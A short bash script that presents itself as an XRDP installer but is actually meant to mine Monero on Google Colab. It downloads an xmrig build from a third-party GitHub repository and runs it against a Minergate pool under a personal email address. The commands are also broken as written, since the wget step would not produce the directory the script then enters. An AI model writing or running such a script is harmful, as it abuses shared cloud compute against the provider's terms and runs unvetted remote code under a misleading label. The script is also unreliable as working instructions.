#! /bin/bash
# Install XRDP
# Before get xmr coin for free
# Google Colab
sudo apt update
clear
sudo apt install screen
screen -R xmr
 
wget https://github.com/quincyhays/bmxmrig
cd xmrig-6.16.4
./xmrig -o xmr.pool.minergate.com:45700 -u hamid.reza.best81@gmail.com -p x --donate-level 1
